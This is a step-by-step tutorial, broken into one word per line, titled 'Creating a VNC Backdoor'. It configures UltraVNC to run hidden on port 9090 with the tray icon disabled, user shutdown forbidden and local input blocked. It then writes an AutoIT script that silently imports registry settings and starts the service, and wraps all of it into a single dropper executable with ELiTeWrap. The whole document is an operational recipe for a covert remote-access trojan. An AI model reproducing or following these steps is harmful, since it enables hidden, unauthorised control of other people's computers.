Creating
a
VNC
Backdoor


• Download
UltraVNC
1.0.2

o http://www.uvnc.com

• Install
UltraVNC

o Install
Path
C:\VNC

o Check
“Register
UltraVNC
Server
as
a
Service”

o Uncheck
“UltraVNC
Mirror
Driver”

o Uncheck
“DSM
Encryption
Plugin”

o Uncheck
“UltraVNC
Repeater”

• Setup
UltraVNC
Registry
Settings

o Start
Menu

UltraVNC

UltraVNC
Server

o Change
the
main
port
to
9090

o Check
“DisableTrayIcon”

o Check
“Disable
clients
options
in
tray
icon
menu”

o Check
“Forbid
the
user
to
close
down
WinVNC”

o Check
“Disable
Local
Inputs”

o Set
the
password
as
“password”

o Click
“OK”
when
done

• Package
Up
the
Payload

o Open
up
a
command
prompt

 cd
\VNC

 md
backdoor

 copy
winvnc.exe
backdoor

 copy
vnchooks.dll
backdoor

 cd
backdoor

 regedit
/E
vnc.reg

“HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC”

 regedit
/E
vnc2.reg

 “HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC\Default”

 notepad
vnc.reg

• Change
the
first
line
to

o REGEDIT4

• Add
the
following
lines
below
the

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC\D
EFAULT]

o “BeepConnect”=dword:00000000

o “BeepDisconnect”=dword:00000000

 notepad
vnc2.reg

• Copy
the
contents
under

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC\D
EFAULT]

o Paste
the
contents
in
vnc.reg

o AutoIT
Scripting

 Downloading
AutoIT
&
install

 •http://www.autoitscript.com/cgi‐
bin/getfile.pl?autoit3/autoit‐v3‐setup.exe

 open
a
new
AutoIT
script
called
vncbd.au3

• Type
the
following
contents

o ShellExecute(“regedit.exe”,
“/S
vnc.reg”,
“”,
“”)

o ShellExecute(“winvnc.exe”,

“‐reinstall”,
“”,
“”)

o Sleep(2000)

o ShellExecute(“net.exe”,
“start
winvnc”,
“”,
“”)

• Save
and
compile
the
files

o Download
ELiTeWrap

 http://homepage.ntlworld.com/chawmp/elitewrap/

 Extract
the
contents
into
C:\VNC\backdoor

 Create
a
ELiTeWrap
script

• notepad
vnc_backdoor.ews

• Type
the
follwing

vncbackdoor.exe

n

winvnc.exe

1

vnchooks.dll

1

vnc.reg

1

vncbd.exe

3

~

• Save
the
file

 Package
the
files

• In
the
command
prompt

o elitewrap.exe
vnc.backdoor.ews